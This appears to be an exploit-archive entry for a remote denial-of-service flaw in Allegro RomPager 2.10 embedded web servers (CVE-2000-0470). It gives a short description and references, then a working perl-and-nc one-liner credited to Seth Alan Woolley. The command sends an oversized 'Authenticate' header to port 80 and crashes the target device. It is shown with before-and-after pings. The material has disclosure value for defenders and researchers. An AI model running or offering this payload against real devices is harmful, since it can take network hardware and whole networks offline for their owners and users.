doshardwaretext
Allegro RomPager 2.10 - Malformed URL Request Denial of Service
Allegro RomPager 2.10 - Malformed URL Request Denial of Service
Published on 2000-06-01
Source code
Pinned to commit 7eac4c3a2ce5textplatforms/hardware/dos/10237.txt7eac4c3a
raw Allegro's RomPager is reported prone to a remote denial of service vulnerability.
If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser.
CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304
The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works
the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80
$ ping $ip_address # doesn't work